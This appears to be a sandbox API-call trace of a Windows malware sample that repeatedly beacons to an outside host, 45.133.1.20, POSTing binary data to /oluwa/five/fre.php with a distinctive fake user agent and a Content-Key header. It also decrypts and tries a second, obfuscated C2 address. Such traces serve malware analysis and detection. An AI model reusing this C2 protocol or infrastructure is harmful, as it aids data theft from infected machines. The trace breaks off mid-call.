0x0 [0217.380] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0217.381] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0217.383] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0217.384] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0217.384] GetProcessHeap () returned 0x6a0000 [0217.384] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0217.384] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0217.384] GetProcessHeap () returned 0x6a0000 [0217.384] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6bab40 [0217.384] socket (af=2, type=1, protocol=6) returned 0x630 [0217.384] connect (s=0x630, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0217.411] FreeAddrInfoW (pAddrInfo=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0217.411] GetProcessHeap () returned 0x6a0000 [0217.411] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bef48 [0217.411] GetProcessHeap () returned 0x6a0000 [0217.411] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6d8710 [0217.412] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0217.412] wvsprintfA (in: param_1=0x6d8710, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0217.412] GetProcessHeap () returned 0x6a0000 [0217.412] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bd460 [0217.412] GetProcessHeap () returned 0x6a0000 [0217.413] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d8710 | out: hHeap=0x6a0000) returned 1 [0217.413] GetProcessHeap () returned 0x6a0000 [0217.413] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4910 [0217.413] GetProcessHeap () returned 0x6a0000 [0217.413] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6d8710 [0217.415] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0217.416] wvsprintfA (in: param_1=0x6d8710, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0217.416] GetProcessHeap () returned 0x6a0000 [0217.416] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6b5c98 [0217.416] GetProcessHeap () returned 0x6a0000 [0217.417] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d8710 | out: hHeap=0x6a0000) returned 1 [0217.417] send (s=0x630, buf=0x6b5c98*, len=242, flags=0) returned 242 [0217.417] send (s=0x630, buf=0x6bb998*, len=159, flags=0) returned 159 [0217.417] GetProcessHeap () returned 0x6a0000 [0217.418] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c66f8 [0217.418] recv (in: s=0x630, buf=0x6c66f8, len=4048, flags=0 | out: buf=0x6c66f8*) returned 204 [0217.494] GetProcessHeap () returned 0x6a0000 [0217.494] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5c98 | out: hHeap=0x6a0000) returned 1 [0217.495] GetProcessHeap () returned 0x6a0000 [0217.495] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0217.495] GetProcessHeap () returned 0x6a0000 [0217.496] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0217.496] GetProcessHeap () returned 0x6a0000 [0217.496] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bef48 | out: hHeap=0x6a0000) returned 1 [0217.497] closesocket (s=0x630) returned 0 [0217.497] GetProcessHeap () returned 0x6a0000 [0217.497] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bab40 | out: hHeap=0x6a0000) returned 1 [0217.497] GetProcessHeap () returned 0x6a0000 [0217.498] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0217.498] GetProcessHeap () returned 0x6a0000 [0217.498] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0217.498] GetProcessHeap () returned 0x6a0000 [0217.499] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0217.499] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c66f8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xc9c) returned 0x630 [0217.501] Sleep (dwMilliseconds=0xea60) [0217.503] GetProcessHeap () returned 0x6a0000 [0217.503] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0217.504] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0217.505] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0217.512] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0217.513] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beca0) returned 1 [0217.523] GetProcessHeap () returned 0x6a0000 [0217.523] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0217.525] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0217.525] CryptImportKey (in: hProv=0x6beca0, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0217.526] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0217.527] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0217.528] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0217.528] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0217.528] GetProcessHeap () returned 0x6a0000 [0217.529] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0217.529] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0217.530] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0217.530] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0217.531] CryptDestroyKey (hKey=0x6ad020) returned 1 [0217.531] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0217.532] CryptReleaseContext (hProv=0x6beca0, dwFlags=0x0) returned 1 [0217.532] GetProcessHeap () returned 0x6a0000 [0217.532] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0217.533] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0217.533] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0217.544] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0217.544] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0217.545] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0217.546] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0217.548] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0217.549] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0217.549] GetProcessHeap () returned 0x6a0000 [0217.549] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0217.549] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0217.549] GetProcessHeap () returned 0x6a0000 [0217.550] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0217.550] GetProcessHeap () returned 0x6a0000 [0217.550] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0217.550] GetProcessHeap () returned 0x6a0000 [0217.550] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0217.550] GetProcessHeap () returned 0x6a0000 [0217.550] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0217.551] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0217.551] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0217.556] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0217.557] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0217.564] GetProcessHeap () returned 0x6a0000 [0217.564] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0217.564] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0217.565] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0217.566] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0217.567] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0217.567] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0217.568] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0217.568] GetProcessHeap () returned 0x6a0000 [0217.568] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0217.571] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0217.571] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0217.572] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0217.573] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0217.573] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0217.574] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0217.574] GetProcessHeap () returned 0x6a0000 [0217.574] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0217.574] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0217.575] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0217.575] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0217.576] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0217.577] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0217.577] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0217.578] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0217.578] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0217.578] GetProcessHeap () returned 0x6a0000 [0217.578] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0217.578] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0217.578] GetProcessHeap () returned 0x6a0000 [0217.578] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa60 [0217.578] socket (af=2, type=1, protocol=6) returned 0x634 [0217.579] connect (s=0x634, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0217.603] FreeAddrInfoW (pAddrInfo=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0217.603] GetProcessHeap () returned 0x6a0000 [0217.603] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bef48 [0217.603] GetProcessHeap () returned 0x6a0000 [0217.603] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6d8710 [0217.604] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0217.615] wvsprintfA (in: param_1=0x6d8710, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0217.615] GetProcessHeap () returned 0x6a0000 [0217.615] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bd460 [0217.616] GetProcessHeap () returned 0x6a0000 [0217.617] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d8710 | out: hHeap=0x6a0000) returned 1 [0217.623] GetProcessHeap () returned 0x6a0000 [0217.623] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4be0 [0217.623] GetProcessHeap () returned 0x6a0000 [0217.623] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6d8710 [0217.626] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0217.627] wvsprintfA (in: param_1=0x6d8710, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0217.627] GetProcessHeap () returned 0x6a0000 [0217.627] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6b5c98 [0217.627] GetProcessHeap () returned 0x6a0000 [0217.628] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d8710 | out: hHeap=0x6a0000) returned 1 [0217.628] send (s=0x634, buf=0x6b5c98*, len=242, flags=0) returned 242 [0217.629] send (s=0x634, buf=0x6bb998*, len=159, flags=0) returned 159 [0217.629] GetProcessHeap () returned 0x6a0000 [0217.629] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c66f8 [0217.629] recv (in: s=0x634, buf=0x6c66f8, len=4048, flags=0 | out: buf=0x6c66f8*) returned 204 [0217.704] GetProcessHeap () returned 0x6a0000 [0217.704] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5c98 | out: hHeap=0x6a0000) returned 1 [0217.705] GetProcessHeap () returned 0x6a0000 [0217.705] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0217.705] GetProcessHeap () returned 0x6a0000 [0217.706] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0217.706] GetProcessHeap () returned 0x6a0000 [0217.706] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bef48 | out: hHeap=0x6a0000) returned 1 [0217.706] closesocket (s=0x634) returned 0 [0217.707] GetProcessHeap () returned 0x6a0000 [0217.707] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa60 | out: hHeap=0x6a0000) returned 1 [0217.707] GetProcessHeap () returned 0x6a0000 [0217.707] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0217.708] GetProcessHeap () returned 0x6a0000 [0217.708] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0217.708] GetProcessHeap () returned 0x6a0000 [0217.708] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0217.709] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c66f8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xc78) returned 0x634 [0217.710] Sleep (dwMilliseconds=0xea60) [0217.712] GetProcessHeap () returned 0x6a0000 [0217.712] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0217.714] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0217.714] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0217.727] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0217.727] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf058) returned 1 [0217.736] GetProcessHeap () returned 0x6a0000 [0217.736] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0217.737] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0217.737] CryptImportKey (in: hProv=0x6bf058, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0217.738] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0217.738] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0217.739] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0217.739] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0217.739] GetProcessHeap () returned 0x6a0000 [0217.740] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0217.740] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0217.741] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0217.741] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0217.742] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0217.742] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0217.743] CryptReleaseContext (hProv=0x6bf058, dwFlags=0x0) returned 1 [0217.743] GetProcessHeap () returned 0x6a0000 [0217.743] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0217.743] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0217.750] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0217.751] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0217.752] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0217.752] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0217.752] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0217.753] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0217.753] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0217.753] GetProcessHeap () returned 0x6a0000 [0217.754] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0217.754] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0217.754] GetProcessHeap () returned 0x6a0000 [0217.755] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0217.755] GetProcessHeap () returned 0x6a0000 [0217.755] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0217.755] GetProcessHeap () returned 0x6a0000 [0217.755] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0217.755] GetProcessHeap () returned 0x6a0000 [0217.755] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0217.758] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0217.758] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0217.764] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0217.764] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0217.772] GetProcessHeap () returned 0x6a0000 [0217.772] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0217.773] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0217.774] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0217.775] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0217.775] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0217.776] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0217.776] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0217.776] GetProcessHeap () returned 0x6a0000 [0217.777] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0217.778] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0217.778] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0217.782] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0217.783] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0217.784] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0217.784] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0217.784] GetProcessHeap () returned 0x6a0000 [0217.784] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0217.785] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0217.786] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0217.787] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0217.791] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0217.792] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0217.792] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0217.793] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0217.793] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0217.793] GetProcessHeap () returned 0x6a0000 [0217.793] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0217.793] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, 